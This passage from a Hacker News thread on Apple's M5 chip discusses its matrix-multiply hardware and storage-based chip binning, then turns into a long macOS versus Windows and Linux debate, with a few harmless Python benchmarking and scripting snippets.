                  >how iOS users actually use their phone.

                  What does this even mean? Do you think I mean people are running Qwen3-Embedding-4B in pytorch on their device or something? Loads of apps, including mobile games, have models in them now. This is not rare, and most users are blissfully unaware.

                  • kanaffa12345 5 hours ago

                    > That CoreML models are prolific on Apple platforms? That Apple devices are prolific?

                    correct and non-controversial

                    > An enormous number of people and products [use CoreML on Apple platforms]

                    non-sequitur

                    EDIT: i see people are not aware of

                    https://en.wikipedia.org/wiki/Simpson%27s_paradox

  • xiphias2 an hour ago

    My guess is that they moved the systolic arrays inside the GPU cores just like how it's done in modern NVIDIA chips.

    That's the only way to speed up MLX 4x compared to M4.
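
    That should be easy to check once hardware ships; a trivial GEMM micro-benchmark, assuming the mlx Python package (no numbers claimed here, the point is just how one would measure):

        import time
        import mlx.core as mx

        a = mx.random.normal((4096, 4096))
        b = mx.random.normal((4096, 4096))
        mx.eval(a, b)                 # materialize inputs (MLX is lazy)

        t0 = time.perf_counter()
        mx.eval(a @ b)                # force the matmul to actually run
        dt = time.perf_counter() - t0
        print(f"{2 * 4096**3 / dt / 1e12:.2f} TFLOPS")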

  • zuspotirko 6 hours ago

    Of course it's true. Unified memory is always less than VRAM, and my 16 GB of VRAM isn't enough.

    But I think it's also a huge issue that Apple makes storage so expensive. If Apple wants local AI to answer your questions, it should be able to take your calendar, emails, text messages, photos, journal entries, etc. into account. It can't do that as nicely as long as customers opt for only 256 GB or 1 TB devices due to cost.

  • JKCalhoun 7 hours ago

    I can only guess that significant changes in hardware have longer lead times than software (for example). I suppose I am not expecting anything game-changing until the M6.

gcr 7 hours ago

So how many hardware systems does Apple silicon have for doing matrix multiplies now?

1. CPU, via SIMD/NEON instructions (just dot products)

2. CPU, via the AMX coprocessor (entire matrix multiplies, M1-M3)

3. CPU, via SME (M4)

4. GPU, via Metal (compute shaders + simdgroup_matrix + MPS matrix kernels)

5. Neural Engine, via CoreML (advisory)

Apple also appears to be adding a “Neural Accelerator” to each core on the M5?

  • throwaway31131 2 hours ago

    Doesn't that make sense, though? Each manipulates a different layer in the memory hierarchy, letting the programmer control the latency and throughput implications. I see it as a good thing.

  • jmrm 4 hours ago

    I wonder if some Apple-made software, like Final Cut, makes use of all of those "duplicated" instructions at the same time to get better performance...

    I know the multitasking nature of the OS probably makes this happen across different programs anyway, but it would nonetheless be pretty cool!

  • nullbyte 4 hours ago

    Thankfully, I think libraries like PyTorch abstract this stuff away. But it seems very convoluted if you're building something from the ground up.
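
    For what it's worth, the abstraction is pretty thin from the PyTorch side - a minimal sketch using its Metal ("mps") backend, assuming a reasonably recent PyTorch build:

        import torch

        # Use Metal if available, else fall back to the CPU
        # (where matmuls go through Accelerate's SIMD/AMX paths).
        device = "mps" if torch.backends.mps.is_available() else "cpu"

        a = torch.randn(1024, 1024, device=device)
        b = torch.randn(1024, 1024, device=device)
        print(device, (a @ b).shape)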

    • gardnr 3 hours ago

      Does PyTorch support other acceleration? I thought they just support Metal.

  • twoodfin 4 hours ago

    Is this really strange? Matmul is just a specialized kind of primitive compute, one that is seeing an explosion in practical uses.

    A Mac Quadra in 1994 probably had floating point compute all over the place, despite the 1984 Mac having none.

  • oskarkk 6 hours ago

    Would it be possible to use all of them at the same time? Not necessarily in a practical way, just for fun? Could the different ways of doing this on the CPU be exercised to some extent by one core at the same time, given that it's superscalar?
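
    Something like this toy sketch would at least drive two of them concurrently from Python threads - the CPU path (SIMD, and possibly AMX via Accelerate) and the GPU via PyTorch's mps backend; the ANE isn't directly addressable from here, so it's left out:

        import threading
        import torch

        def cpu_matmul():
            a = torch.randn(2048, 2048)        # plain CPU tensor
            (a @ a).sum().item()

        def gpu_matmul():
            if torch.backends.mps.is_available():
                a = torch.randn(2048, 2048, device="mps")
                (a @ a).sum().item()           # .item() syncs with the GPU

        threads = [threading.Thread(target=f) for f in (cpu_matmul, gpu_matmul)]
        for t in threads: t.start()
        for t in threads: t.join()
        print("both matmuls done")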

  • HeckFeck 3 hours ago

    Adding CPUs and GPUs on top of your CPUs and GPUs... sounds like we've got the spiritual successor of the Sega Saturn.

  • llm_nerd an hour ago

    >Apple also appears to be adding a “Neural Accelerator” to each core on the M5?

    The "neural accelerator" is per GPU core, and is matmul. e.g. "Tensor cores".

  • hannesfur 7 hours ago

    I inferred that by "neural accelerators" they meant the Neural Engine cores, or it could be a bigger/different AMX (which really should become a standard, btw).

warrenmiller a minute ago

Why only on the 14", not the 16"?

drnick1 3 hours ago

A lot of Apple hardware is impressive on paper, but I will never buy a Mac that can't run Linux. I simply don't want to live in Apple's walled garden.

Then there is the whole ARM vs. x86 issue. Even if a compatible Linux distro were made, I expect to run all kinds of software on my desktop rig, including games, and ARM is still a dead end for that. For laptops it's probably a sensible choice now, but we're still far from a truly free and usable ARM desktop.

  • littlecranky67 an hour ago

    > A lot of Apple hardware is impressive on paper, but I will never buy a Mac that can't run Linux.

    They actually run Linux very well - have you ever tried Parallels or VMware Fusion? Parallels especially ships with good software drivers for 2D/3D/video acceleration, suspend, and integration into the host OS. If that is not your thing, the new native container solution in Tahoe can run containers from Docker Hub and co.

    > I simply don't want to live in Apple's walled garden.

    And what walled garden would that be on macOS? You can install whatever you want, and there is Homebrew at your fingertips with all the open and non-open software you could ask for.

    • mixmastamyk an hour ago

      Last I looked... extensive telemetry and a sealed boot volume that makes it impractical to turn off even if theoretically possible. There are other problems of course.

    • imoverclocked an hour ago

      ... or UTM. I have run Windows and Linux on my M1 MB Pro with plenty of success.

      Windows - because I needed it for a single application.

      Linux - has been extremely useful as a complement to the small ARM SBCs that I run. E.g., compiling a kernel is much faster there than on (say) a Raspberry Pi. Also, USB device sharing makes working with vfat/ext4 filesystems on small memory cards a breeze.

  • geek_at 2 hours ago

    I'm still looking for a decent ARM laptop that runs Linux well. I have my eye on one from Lenovo, but Linux support is still not the best.

  • drcode an hour ago

    M1 and M2 Macs run Asahi Linux very well (but there's no option for M3/M4/M5 yet).

  • gffrd an hour ago

    OK, so then don't.

alberth 7 hours ago

Apple is binning the iPad Pro chips:

   Storage      CPU
   ≤ 512GB      3 P-cores (and 6 E-cores)
   1TB+         4 P-cores (and 6 E-cores)
https://www.apple.com/ipad-pro/specs/
  • tempaccount420 3 hours ago

    Storage-gating is really disgusting considering how much Apple charges for storage.

    • aloer 2 hours ago

      IIRC, in the past it was about memory: larger storage needs more memory for caching.

      So that made at least some sense.

      I guess yields might be good enough that they can afford to bin with another core in there as well.

      Memory is probably still the main reason for the binning in the first place.

mohsen1 8 hours ago

First time seeing Apple use "AI" in their marketing material. It was "Machine Learning" and "Apple Intelligence" before...

  • mentalgear 8 hours ago

    Unfortunately, they have also succumbed to the AI hype machine. Apple calling it by its actual name, "machine learning", was about the only thing I still liked about Apple.

    • rpdillon 7 hours ago

      Wait, didn't they try to backronym their way into "Apple Intelligence" last cycle?

      https://www.apple.com/apple-intelligence/

      • kryllic 7 hours ago

        Probably don't want to draw more attention to their ongoing lawsuits [1]. Apple, for all its faults, does enjoy consistency, and the unruly nature of LLMs is something I'm shocked they thought they could tame in a short amount of time. The fallout from the hilariously bad news/message "summaries" was more than enough to spook Apple from letting that go much further.

        >Built into your iPhone, iPad, Mac, and Apple Vision Pro* to help you write, express yourself, and get things done effortlessly.** Designed with groundbreaking privacy at every step.

        The asterisks are really icing on the cake here.

        ---

        [1] https://news.bloomberglaw.com/ip-law/apple-accused-of-ai-cop...

    • kgwgk 7 hours ago

      > actual name "machine learning"

      Yesterday’s hype is today’s humility.

    • adastra22 4 hours ago

      Machine learning is a bit more specific than what we now call AI, no?

  • vessenes 7 hours ago

    I like sniping - but I could make a product call here to support the messaging: when it's running outside diffusion models and LLMs (as per the press release), we could call that AI. Agreed that they should at least have mentioned Apple Intelligence in their PR, though.

  • vayup 6 hours ago

    I am sure by AI they mean Apple Intelligence:-)

  • low_tech_punk 7 hours ago

    Not all is lost: AI can still be an acronym for Apple Intelligence.

toddmorey 8 hours ago

The modern Apple feels like its hardware teams are way outperforming its software teams.

  • linguae 8 hours ago

    This is not the first time this has happened in Apple’s history. The transition from the 68k architecture to the PowerPC brought major performance improvements, but Apple’s software didn’t take full advantage of it. If I remember correctly, even after the PowerPC switch, core elements of the classic Mac OS still ran in emulation as late as Mac OS 9. Additionally, the classic Mac OS lacked protected memory and preemptive multitasking, leading to relatively frequent crashes. Taligent and Copland were attempts to address these issues, but they both faced development hell, culminating with the purchase of NeXT and the development of Mac OS X. But by the time Mac OS X was released, PowerPC was becoming less competitive than the x86, culminating with the Intel switch in 2006. At this point it was Apple’s software that distinguished Macs from the competition, which remained the case until the M1 Macs were released five years ago.

    • mikepurvis 8 hours ago

      Sixteen years ago, John Gruber wrote:

      > Hardware and software both matter, and Apple’s history shows that there’s a good argument to be made for developing integrated hardware and software. But if you asked me which matters more, I wouldn’t hesitate to say software. All things considered I’d much prefer a PC running Mac OS X to a Mac running Windows.

      https://daringfireball.net/2009/11/the_os_opportunity

      At the time I'd only been a Mac user for a few years and I would have strongly agreed. But definitely things have shifted— I've been back on Windows/WSL for a number of years, and it's software quality/compatibility issues that are a lot of what keeps me from trying another Mac. Certainly I'm far more tempted by the hardware experience than I am the software, and it's not even really close.

      • selectodude 8 hours ago

        That's so wild to me - my personal laptop is still a Mac, but I'm in Windows all day for work. Some of the new direction of macOS isn't awesome, but the basics are still rock solid. The touchpad is perfect, sleep works 100% of the time for days on end, and it still has UNIX underneath.

        • pico303 7 hours ago

          Same boat, and 100% agree. I couldn't find a single example of Windows or Windows software where I think the experience is in any way better. Windows' only saving grace, as a developer, is WSL.

          For a simple example, no app remembers the last directory you were working in. The keys each app uses are completely inconsistent from app to app. And it was only in Windows 11 that Windows started remembering my window configuration when I plugged and unplugged a monitor. Then there are the Windows 95-style dialog boxes mixed in with the Windows 11-style dialog boxes; what a UI mess. I spoke with one vendor the other day who was actually proud they'd adopted a ribbon interface in their UI "just like Office", and I laughed out loud.

          From a hardware perspective, I still don't understand why Windows and laptop manufacturers can't get sleep working right. My Intel MacBook Pro with an old battery still sleeps, wakes, and lasts for several hours, while my new Windows laptop lasts about an hour and won't wake from hibernate half the time without a hard reboot.

          I think Windows is just "good enough" for most people.

          • BeetleB 6 hours ago

            > I couldn’t find a single example of Windows or Windows software where I think the experience is in any way better.

            While overall I may say MacOS is better, I would not say it's better in every way.

            Believe it or not, I had a better experience with 3rd party window managers in Windows than on MacOS.

            I don't think the automation options in MacOS are better than AutoHotKey (even Linux doesn't have something as good).

            And for corporate work, the integration with Windows is much better than anything I've seen on MacOS.

            Mac HW is great. The OS is in that uncanny valley where it's UNIX, but not as good as Linux.

            • robenkleene 4 hours ago

              > I don't think the automation options in MacOS are better than AutoHotKey (even Linux doesn't have something as good).

              Did you try Keyboard Maestro? https://www.keyboardmaestro.com/main/ (I've never used AutoHotKey and I'd be super curious whether there are deficiencies in KM relative to it, but Keyboard Maestro is, from my perspective, a masterpiece; it's hard to imagine it being any better.)

              Also, I think this statement needs a stronger defense, given that macOS includes Shortcuts, Automator, and AppleScript. I don't know much about Windows automation, but I've never heard of it having something like AppleScript, which can, say, migrate data between applications without GUI scripting (e.g., iterate through open browser tabs and create todos from each of them, operating directly on the application data rather than scripting the UI) - see the sketch below.
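
              As a concrete sketch of that browser-tab example, here's Safari's AppleScript dictionary driven from Python via osascript (assumes macOS with automation permission granted; the comma-split parsing is naive and just for illustration):

                  import subprocess

                  # Ask Safari for the URL of every open tab, via AppleScript.
                  script = 'tell application "Safari" to get URL of every tab of every window'
                  out = subprocess.run(
                      ["osascript", "-e", script],
                      capture_output=True, text=True, check=True,
                  )
                  urls = [u.strip() for u in out.stdout.split(",") if u.strip()]
                  print(urls)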

              • wingworks an hour ago

                Yeah, the things AppleScript can do are so crazy. I've fully automated keeping one tab in Chrome logged into a website that insists on logging me out every hour or so. (Not banking or anything.)

          • jpalawaga 5 hours ago

            Macs also can't get sleep right. Have you tried to make a MacBook consistently stay awake when the lid is closed?

            You can't, really. Almost everyone resorts to buying an HDMI dongle to fake a display. Apple solved the problem at such a low level that the flexibility to run something in clamshell mode is broken, even when using Caffeine/Amphetamine/etc.

            So, tradeoffs. They made their laptops go to sleep very well, but broke functionality in the process. You can argue it's a good tradeoff; just acknowledge that there WAS a tradeoff made.

            • cyberpunk 4 hours ago

              Counter-example: I ran an Air without a monitor connected for years using Caffeine; it worked perfectly for me.

          • strbean 5 hours ago

            > And it was only in Windows 11 that Windows started remembering my window configuration when I plugged and unplugged a monitor.

            Oh god, I'm going to have to bite the bullet and switch to 11, huh?

            The one thing that has been saving me from throwing my PC out the window in rage has been the monitor I have that supports a "keep alive" mode where switching inputs is transparent to the computers connected to it. So when switching inputs between my PC and laptop neither one thinks the monitor is being disconnected/reconnected. If it wasn't for that, I'd be screaming "WHY ARE YOU MOVING ALL MY WINDOWS?" on a regular basis. (Seriously, why are you moving all my windows? Sure, if they're on the display that was just disconnected, I get you. But when I connect a new display, Windows 10 seems to throw a dart at the display space for every window and shuffle them to new locations. Windows that live in a specific place on a specific display 100% of the time just fly around for no reason. Please god just stop.)

          • prewett 5 hours ago

            > Windows only saving grace, as a developer, is WSL.

            So, Windows' saving grace is being able to run a different operating system inside it? Damning with faint praise if I ever heard it...

            • dboreham 4 hours ago

              Also the control key works.

              • simonh 3 hours ago

                Just enable space bar heating.

        • oritron 7 hours ago

          > the basics are still rock solid

          A friend of mine lost a ton of messages when upgrading the OS (and therefore Mail). A number of others were affected by the same issue. There have been show-stopper bugs in the core functionality of Photos as well. I don't get the impression that the basics are Apple's focus with respect to software.

          • simonask 7 hours ago

            It’s not as if such bugs are unheard of for Windows users, and certainly not Linux users.

            But I’ve certainly never struggled with getting WiFi to work on a Mac, or struggled with getting it to sleep/wake, or a host of other problems you routinely have on both Windows and Linux.

            It’s not even close.

            • oritron 6 hours ago

              I haven't heard about surprise-your-files-are-deleted bugs in core programs of other systems. That's a bigger show-stopper in my opinion.

              To compare Apples to apples, you'd have to look at a Framework computer and agree that wifi is going to work out of the box... but here I'm meeting you on a much weaker argument: "Apple's software basics are /not/ rock solid, but other platforms have issues too"

              • robenkleene 4 hours ago

                > I haven't heard about surprise-your-files-are-deleted bugs in core programs of other systems. That's a bigger show-stopper in my opinion.

                I don't find your original anecdote convincing:

                > A friend of mine lost a ton of messages when upgrading the OS (and therefore Mail).

                E.g., what does this mean? They lost mail messages? How did they verify they had those messages before and after - file-system operations? GUI search? How much do they know about how Mail.app stores messages (I used to try to understand this decades ago, but I expect today messages aren't even necessarily always stored locally)? How are they syncing mail messages - native IMAP, whatever Gmail uses, or Exchange? What's the email backend?

                E.g., without deeper evidence this sounds more like a mail-message indexing issue than a mail-messages-stored-on-disk issue (in 2025, I'd personally have zero expectations about how Mail manages messages on disk; I'd expect local storage of messages to be dynamically managed, like most applications that aren't document-based, using a combination of cloud functionality and local caching - I found this in a quick search: https://apple.stackexchange.com/questions/471801/ensure-maco...), but if you have stronger evidence I'd love to hear it. As presented, you're extrapolating much stronger conclusions than the anecdote warrants, in my opinion.

                • oritron 2 hours ago

                  Mail deleted a large number of messages, but not all of them. They were stored in files (which were smaller on disk afterwards, so it was not an indexing issue), and recovery required loading snapshots from Time Machine, converting them to a format Thunderbird could import, and transitioning to that.

                  • robenkleene 2 hours ago

                    You've only addressed something like 30% of the issues I asked about (although I'm honestly impressed you got that far); e.g., I wouldn't call Apple Mail an application designed to manage a collection of emails on disk. Isn't the important question here whether the emails were still stored on the server? Or were they using POP?

            • afandian 6 hours ago

              I've been using Mac OS since 10.3 and, whilst it's better now, I've had a memorable number of WiFi connection bugs. And ISTR issues with waking from sleep, but that might have been before the Intel migration. It's never been immune from bugs.

            • philsnow 4 hours ago

              > But I’ve certainly never struggled with getting WiFi to work on a Mac

              I want to be able to set different networking options (manual DNS, etc) for different wifi networks, but as far as I can tell, I can only set them per network interface.

              There's something like "locations" but last time I tried using that, the entire System Settings.app slowed to a crawl / beachballed until I managed to turn it back off.

              > or struggled with getting it to sleep/wake

              My m1 MBP uses something like 3-5% of its battery per hour while sleeping, because something keeps waking it up. I tried some app that is designed to help you diagnose the issue but came up empty-handed.

              ... but yes on both counts, it's light years better than my last experience with Linux, even on hardware that's supposed to have fantastic support (thinkpads).

        • eitally 6 hours ago

          I've been primarily on a Macbook for the past three years, after almost 10 years using Chromebooks as my primary machines (yay work at Google). Until 2015, I had been a rabid defender of Thinkpads (T-series, mostly), and used Windows at work and Linux (mostly Kubuntu) at home, from around 2009-2015.

          Long story short, I was very happy with the "it just works" of ChromeOS, and only let down by the lack of support for some installed apps I truly needed in my personal life. I tried a Mac back in 2015 but couldn't get used to how different it was; it felt very bulky compared to ChromeOS and much slower than the Linux machine I'd had, so I switched to a Pixelbook and was pretty content.

          Fast forward to 2023 when I needed to purchase a new personal laptop. I'd bought my daughter a Pixelbook Go in 2021 and my son a Lenovo x1 Carbon at the same time. Windows was such a dumpster fire I absolutely ruled it out, and since I could run all the apps I needed on ChromeOS it was between Linux & Mac. I decided to try a Mac again, for both work & personal, and I've been a very happy convert ever since.

          My M2 Pro has been rock solid, and although I regret choosing to upgrade to Sequoia recently, it still makes me feel better than using Windows. M4 Pro for work is amazingly performant and I still can't get over the battery efficiency. The nicest thing, imho, is that the platform has been around long enough for a mature & vibrant ecosystem of quality-of-life utilities to exist at this point, so even little niggles (like why do I need the Scroll Reverser app at all?) are easy to deal with, and all my media editing apps are natively available.

          • TheAmazingRace an hour ago

            Sequoia is honestly a damn sight better than Tahoe. It's only downhill from here!

        • sofixa 6 hours ago

          > sleep works 100% of the time for days on end

          In my case it works roughly ~50% of the time. Probably because of the Thunderbolt monitor connected to power it, idk.

          > the basics are still rock solid

          The basics like the OS flat-out refusing to provide you any debugging information when anything goes wrong? It's rock solid, alright. I had an issue where occasionally I would get an error: "a USB device is using too much power, try unplugging it and replugging it." Which device? Why would Apple tell you that, where is the fun in that?

          Key remapping requires installing a keylogger, and you can't have different scroll directions for the mouse and touchpad. There still isn't window management, which for the sizes of modern monitors is quite constraining.

          > still has UNIX underneath

          A very constrained UNIX. A couple of weeks ago I wanted to test something (pkcs11-tool signing with a software HSM), and it turns out that Apple has decided that libraries can only be loaded from a number of authorized locations which can only be accessed while installing an application. You can't just use a dynamic library you're linking to; it has to be part of a wider install.

        • MichealCodes 8 hours ago

          The basics are not rock solid. Even a core feature such as remote management crashes and freezes every 5 minutes when you connect from a non-Apple machine; many have reported this over the years, but Apple just does Apple. Safari is still atrocious when it comes to web API support. The worst part is that, with Apple, we do not know if these are intentional anti-competitive barriers or actual software bugs. I purchased a Mac mini simply to compile apps via Xcode and can say the core experience is MUCH more buggy than a fresh Windows or Ubuntu install.

          Edit: Hard to call intentionally preventing support for web APIs a power-user thing. This creates more friction for basic users trying to use any web app.

          Edit2: lol, Apple PR must be all over this; went from +5 to -1 in a single refresh. Flagged for even criticizing what they intentionally break.

          • selectodude 7 hours ago

            Safari adds hours of battery life due to its hyper focus on power consumption. The level to which web API standards are affected is rather immaterial to me. I imagine we’re different consumers though.

            • MichealCodes 7 hours ago

              Adds hours of battery life at the expense of making your microphone input completely inaudible due to throttling if you background the tab it's running in.

              On iOS you cannot even keep a web app running in the background. The second you multitask, even with audio/microphone active, Apple kills it. Are they truly adding battery life, or are they cheating by creating restrictions that prevent apps from working?

              Being able to conduct a voice call through the browser seems like a pretty basic use case to me.

            • socalgal2 6 hours ago

              If you're comparing to Chrome, tests show that's no longer true.

            • ahmeneeroe-v2 6 hours ago

              I am in the same boat. I prefer battery life

              • MichealCodes 6 hours ago

                Breaking things is not extending battery life; battery life assumes functionality. Breaking functionality to extend it is a scapegoat, and the break-whatever-you-want behavior could be offered as a mode instead of a one-size-fits-all, we-don't-care-what-breaks approach.

          • butlike 7 hours ago

            They said the basics are rock solid (and I agree). What you're describing I'd consider "power user" territory.

          • astrange 6 hours ago

            Why would you want to support web APIs? They're all just Google proposing 5000 new ways for advertisers to fingerprint you but doing it through "standards".

            • MichealCodes 5 hours ago

              Nice strawman. The core of web APIs is about opening up lower-level functionality to the sandbox/accessibility of the web. Beyond audio and video I/O, there's great stuff coming with WebGPU and WebNN. Web apps are much safer and much more convenient than downloading an app - well, in theory they could be, if support weren't regularly sabotaged to protect a corporate interest in walled gardens.

          • foldr 7 hours ago

            Are those basics? You don’t have to use Safari, and I’ve never used remote management over the 20 years or so that I’ve been a Mac user.

            • MichealCodes 7 hours ago

              If we dismiss remote management as a non-core feature, shouldn't we consider installing a new browser advanced usage as well?

              I understand that this post is about macOS, but yes, we are forced to support Safari on iOS. Many of these corporate decisions to prevent web apps from functioning properly spill over from macOS Safari to iOS Safari.

      • KeplerBoy 8 hours ago

        I bet most people around here would prefer fully supported Linux over macOS on their Apple silicon.

        • vuggamie 8 hours ago

          The best part of MacOS for me is the unix tools. The command line is a real unix command line. And the rest just works. If I need a linux environment I ssh into a VPS.

          • BeetleB 6 hours ago

            > If I need a linux environment I ssh into a VPS.

            I want good window management. Linux gives me a huge number of options. MacOS - not as much.

          • ghaff 7 hours ago

            It doesn't matter for everyone/most. But, yes, having a Unix command line within MacOS is a pretty big win for some of us. Not something I use on a daily basis certainly. And I'd probably set up a Linux box (or ssh into one) if I really needed that routinely. But it's a nice bonus.

          • epistasis 7 hours ago

            Or even just containers on the Mac. Unless you need a GPU with specific hardware, or to connect to a cluster, there's ever decreasing need to use remote boxes.

          • Daneel_ 7 hours ago

            Well, kind of... the commands on macOS are all just a little bit different and a little bit janky. I still had to relearn all the common commands I use in order to function. I survived 6 months before I went back to a Windows/WSL combo.

            • MobiusHorizons 7 hours ago

              Notice the OP said Unix, not Linux. GNU made a lot of incompatible changes to the Unix tools it was cloning. Many people in the Linux community prefer the GNU quirks (they are definitely more performance-optimized, for example). But if you are talking about Unix, the FreeBSD-derived userland on a Mac has real Unix lineage.

            • epistasis 7 hours ago

              If you want the GNU versions of tools rather than the Mac POSIX versions, then brew can help replace your bin directory with all the GNU niceties.

              If you're talking about hardware interaction from the command line, that's very different and I don't think there's a fix.

        • pxc 8 hours ago

          Fully supported Linux + proper suspend-to-RAM are the two things I want out of Apple Silicon and may never quite get. Better online low power states are fine, but I want suspend-to-RAM and suspend-then-hibernate.

          If I close my laptop for a few days, I don't want significant battery drain. If I don't use it for two weeks, I want it to still have life left. And I don't want to write tens of gigabytes to disk every time I close the lid, either!

          • zozbot234 7 hours ago

            What happens if you enable airplane mode before closing the laptop? That should power down all radios so battery drain should be approximately equivalent to S3 standby.

          • ValdikSS 6 hours ago

            Sleep states are not trivial from the security perspective, and they've eliminated the issue by just not allowing it :)

            • astrange 3 hours ago

              It does hibernate. It just takes a long time to do it because the experience of waking up from it is bad.

        • geodel 7 hours ago

          "Fully supported by whom" is the issue and important one. Apple won't do it and going by support from "most people around here" Hector Martin et al got crumbs for years, nowhere near to support the development.

          One can just hand wave "Apple must support Linux and all" but that is not going to get anything done.

        • 7e 7 hours ago

          Linux is a vanity and the illusion is only skin-deep. The overall UX truly sucks.

          • artisin 4 hours ago

            The UX only sucks if you're unwilling to put in a minimal amount of time and effort. After that, it has no equal; it is, by definition, the opposite of vanity.

          • KeplerBoy 6 hours ago

            Which illusion? It's a computer, no more, no less and Linux is a perfectly fine interface to that computer.

          • rowanG077 5 hours ago

            I don't understand. From a pure visual standpoint OSX wins; Linux is not particularly known for looking good or cohesive. But in basically all other matters Linux beats the pants off OSX.

        • Romario77 8 hours ago

          Linux UI is crap compared to the Mac's.

          It's a server or developer box first and a non-technical user's machine second.

          • timschmidt 8 hours ago

            I've felt the opposite for more than a decade. On Linux, it's relatively easy for me to choose a set of applications which all use the same UI toolkit. Additionally, the web browser is often called "Web Browser" in the application launcher, LibreOffice Writer "Word Processor", and so on. In general there is far less branding and advertisement and more focus on function. Linux was the first OS with an "app store" (the package manager). CLI utilities available tend to be the full fat versions with all the useful options, rather than minimalist versions there to satisfy posix compatibility. I could go on.

            On Linux there is variety and choice, which some folks dislike.

            But on the Mac I get whatever Apple gives me, and that is often subject to the limitations of corporate attention spans and development budgets.

            • robenkleene 3 hours ago

              > The web browser is often called "Web Browser" in the application launcher, LibreOffice Writer "Word Processor", and so on. In general there is far less branding and advertisement and more focus on function.

              Should Emacs and Vim both be called "Editor" then?

              To me, this is actually a great example of the problems with Linux as a community: GUI applications seem to just be treated as placeholders (e.g., all word processors are the same?), but then it's inconsistent by celebrating the unique differences between editors like Vim and Emacs. Photoshop, Excel, Logic Pro, and Final Cut Pro are, in my opinion, crown jewels of what we've accomplished in computing, and by extension some of the greatest creations of the human race, democratizing tasks that in some cases would have cost millions of dollars before (e.g., a recording studio in your home). Relegating these to generic names like "spreadsheet" makes them sound interchangeable, when in my opinion they're each individual creations of great beauty that should wear their names with pride. They've helped improve the trajectory of the human race by enabling many individuals to perform tasks they never would have had the resources to do otherwise.

            • MichealCodes 7 hours ago

              > limitations of corporate attention spans and development budgets

              And arbitrary turf wars like their war against web apis/apps causing more friction for devs and end users.

              • ahartmetz 4 hours ago

                I'm a Linux fan and I like that Apple isn't rubber-stamping the two new web APIs a week that Google comes up with. There are hundreds of them, most of them quite small fortunately.

          • gedy 8 hours ago

            That was maybe the case 10+ years ago, but honestly, I've been using Fedora with GNOME on my M1 and it's pretty polished and nice now.

          • markus_zhang 7 hours ago

            [flagged]

            • jll29 7 hours ago

              You are right in saying that discoverability has suffered a lot, through the hiding of scrollbars and similar changes. Also, you need to move the mouse precisely to a particular spot to re-enable the scrollbars; there is little wiggle room, which may make things harder for handicapped people, older users, or people on the move (e.g. me on a train).

              • markus_zhang 4 hours ago

                Yeah, e.g. when you have a very short scrollbar and have to guess where it is for more than 5 seconds... I've kinda grown past that hype; going back to Winux.

                It is SUCH a pity that they have extraordinary hardware (even at that price point I'd still consider it a bargain, especially the Air/mini)...

            • MichealCodes 7 hours ago

              Or just the way the menus are in apps. Some apps implement their own file/edit/view menus at the top of the app window, and some use the Apple version at the top of the OS. If you plug in a TV to use as a monitor and cannot adjust the aspect ratio, you're forced to blindly activate these menus as they're clipped off the screen.

              MacOS folder navigation is a complete pain too: sometimes you see the list of OS folders, sometimes you see only the folder you opened in Finder. If the menu is clipped due to the above aspect-ratio problem, good luck getting to your home folder... There's no functionality to easily open a folder in a terminal. Lots of basics are just counter-intuitive.

              • markus_zhang 3 hours ago

                Yeah, I found it not easy to go up one level in Finder; I actually had to Google it the first time I tried. The way that MacOS wants to conceal information from the user is just insane. I don't know how it is justified. Nevertheless it has a good number of ardent fans.

      • foobarian 3 hours ago

        To me it's not a MacOS vs Windows thing. It's a hardware build quality thing for sure; but even more importantly it's the integration with the OS. Now, you could say we could get a team together and integrate Windows too, but the problem is this is vastly more effective when the hardware and software are co-designed in the same house with strong feedback loops. As a result Apple's product will inevitably be better than those without such an organizational backbone.

        Quoth the Tao of Programming:

        8.4

        Hardware met Software on the road to Changtse. Software said: "You are Yin and I am Yang. If we travel together, we will become famous and earn vast sums of money." And so they set forth together, thinking to conquer the world.

        Presently, they met Firmware, who was dressed in tattered rags and hobbled along propped on a thorny stick. Firmware said to them: "The Tao lies beyond Yin and Yang. It is silent and still as a pool of water. It does not seek fame; therefore, nobody knows its presence. It does not seek fortune, for it is complete within itself. It exists beyond space and time."

        Software and Hardware, ashamed, returned to their homes.

      • qwertytyyuu 8 hours ago

        These days I'd rather have a MacBook running Windows than macOS running on a standard Windows laptop of the same form factor, purely for the efficiency of Apple Silicon.

        • floam 4 hours ago

          It wouldn’t be so power efficient anymore.

      • klooney 5 hours ago

        Advertisements in Windows seem like a deal breaker to me, but I've been gone for a while.

      • lenkite 7 hours ago

        Windows would have beaten MacOS if Microsoft had just done one small, teeny-weeny thing: left the OS alone after Win 10.

        • xedrac 7 hours ago

          I haven't been able to stomach Windows since Vista, and I can barely stomach MacOS. Linux has spoiled me.

        • dysoco 3 hours ago

          Oh but they absolutely did beat MacOS. The amount of people who give a damn about UI polish, response times, etc. is insignificant to them.

          They got away with pushing ads, online and enterprise services, Copilot, etc. to every desktop user.

        • leptons 4 hours ago

          It depends on what you mean by "beat". Windows has a vastly larger market share than Apple has ever had, or ever will.

      • lotsofpulp 7 hours ago

        Seeing my wife have to deal with BSODs, tedious restarts for Windows updates, and myriad issues just to use Teams/Excel makes me think the software issues are far worse on the Windows side.

        Not once in 10 years have I had to troubleshoot while she uses her personal macOS machine, but a Dell Latitude laptop in 2025 still can’t just “open lid, work, close lid”.

        And it’s slower. And eats more battery.

    • larodi 5 hours ago

      Curiously, every big player/vendor doing something remotely relevant to GPU/NPU/APU etc. sees massive growth. Apple's M-processors are much better in terms of price/value ratio for current ML pipelines. But Apple does not have a server line, which seems to be a super massive problem for their products, even though those products actually compete with NVidia in the consumer market, which is a very substantial position, software or not.

      AMD was also lagging with drivers, but now we see OpenAI swearing they're going to buy loads of their products, which so many people were not in favor of just 5-7 years ago.

  • samwillis 8 hours ago

    Software is very easy to bloat, expand scope, and grow to do more than really needed, or just to release apps that are then forgotten about.

    Hardware is naturally limited in scope due to manufacturing costs, and doesn't "grow" in the same way. You replace features and components rather than constantly add to them.

    Apple needs someone to come in and aggressively cut scope in the software, removing features and products that are not needed. Pare it down to something manageable and sustainable.

    • pxc 8 hours ago

      > pare down products and features

      macOS has way too many products but far too few features. In terms of feature-completeness, it's already crippled. What OS features can macOS afford to lose?

      • coredog64 7 hours ago

        I would say it's less about losing and more about focus. Identify the lines of business you don't want to be in and sell those features to a third party who can then bundle them for $1/$10/$20. A $2T company just doesn't care, but I would bet that those excised features would be good enough for a smaller software house.

        (I have the same complaint about AWS, where a bunch of services are in KTLO and would be better served by not being inside AWS)

    • 6SixTy 5 hours ago

      macOS has like no features already, and they keep removing more.

    • panick21_ 7 hours ago

